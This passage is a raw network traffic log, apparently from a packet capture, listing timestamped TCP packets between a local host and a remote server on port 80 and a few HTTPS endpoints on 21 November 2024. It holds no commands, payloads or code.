                                                                                                                                                                              Nov 21, 2024 08:30:36.702419043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.702454090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.702534914 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.703263044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.703413010 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.704140902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.704186916 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.704195023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.704250097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.705019951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.705132961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.705182076 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.705900908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.706002951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.706053019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.706820965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.706932068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.707020044 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.707654953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.707763910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.707865953 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.708580017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.708700895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.708746910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.709456921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.709575891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.709621906 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.710350037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.710433006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.710547924 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.711246967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.711373091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.711477995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.712120056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.712290049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.712342024 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.712984085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.713135004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.713267088 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.713484049 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.713874102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.714075089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.714121103 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.714759111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.714911938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.715636015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.715692997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.715750933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.715797901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.716521978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.716697931 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.716960907 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.717417955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.717556953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.717602015 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.718319893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.718419075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.718527079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.719214916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.719286919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.720046043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.720072985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.721056938 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.721616030 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.721642971 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.722103119 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.722107887 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.732089043 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.819974899 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.864151955 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.864648104 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.864682913 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.865107059 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.865113974 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.875504971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.875646114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.875662088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.875714064 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.875802994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.875917912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.876625061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.876800060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.876840115 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.877526999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.877696991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.877748013 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.878638983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.878655910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.878726959 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.879297972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.879487038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.879590034 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.880126953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.880347013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.880398035 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.881114006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.881176949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.881247044 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.881725073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.881835938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.881925106 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.882591963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.882725000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.882776022 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.883207083 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.883621931 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.883646011 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.884074926 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.884078979 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.885715008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.886063099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.886082888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.886101961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.886109114 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.886136055 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.886171103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.886197090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.886239052 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.886471987 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.886533022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.886548042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.886590958 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.887370110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.887548923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.888257027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.888298988 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.888436079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.888483047 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.889179945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.889197111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.889246941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.889683008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.889785051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.890219927 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.890562057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.890670061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.891220093 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.891453028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.891563892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.891612053 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.892329931 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.892394066 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.893073082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.893209934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.893311977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.893362045 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.894090891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.894196033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.894247055 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.895019054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.895100117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.895157099 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.895868063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.895981073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.896532059 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.896811008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.897006989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.897049904 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.897794008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.897864103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.898051023 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.898566961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.898664951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.898776054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.899416924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.899530888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.899677992 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.900300980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.900399923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.900454044 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.901196003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.901335955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.901385069 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.902055025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.902118921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.902266026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.902952909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.903031111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.903588057 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.903845072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.903955936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.904037952 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.904740095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.904828072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.904890060 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.907687902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.908348083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.908366919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.908382893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.908400059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.908411026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.908426046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.908437014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.908482075 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.908492088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.908679008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.908981085 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.909420967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.909648895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.909693956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.910320044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.910481930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.910559893 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.911294937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.911355972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.911413908 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.912065029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.912204027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.912933111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.912969112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.912997961 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.913032055 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.913832903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.913867950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.913927078 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.914710999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.914747953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.915473938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.915529966 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.915616035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.915663958 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.916582108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.916635036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.917067051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.917120934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.917188883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.917996883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.918051958 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.918081045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.918133020 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.918837070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.918986082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.919759989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.919821978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.919872046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.919919014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.920690060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.920762062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.920823097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.921483040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.942614079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.990102053 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:36.990144014 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.990240097 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:36.990791082 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:36.990808964 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.076711893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.076776981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.076838017 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.077076912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.077205896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.077256918 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.077945948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.078043938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.078248978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.078824997 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.078950882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.079305887 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.079714060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.079802036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.079845905 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.080614090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.080688000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.081068039 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.081471920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.081609011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.081649065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.082324028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.082545042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.082586050 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.083201885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.083255053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.083395004 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.084089041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.084218979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.084268093 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.085004091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.085084915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.085196018 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.085880041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.085997105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.086041927 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.086726904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.086848021 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.086929083 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.087636948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.087763071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.087812901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.088509083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.088588953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.088704109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.089380980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.089581966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.089713097 CET4976280192.168.2.6185.215.113.16
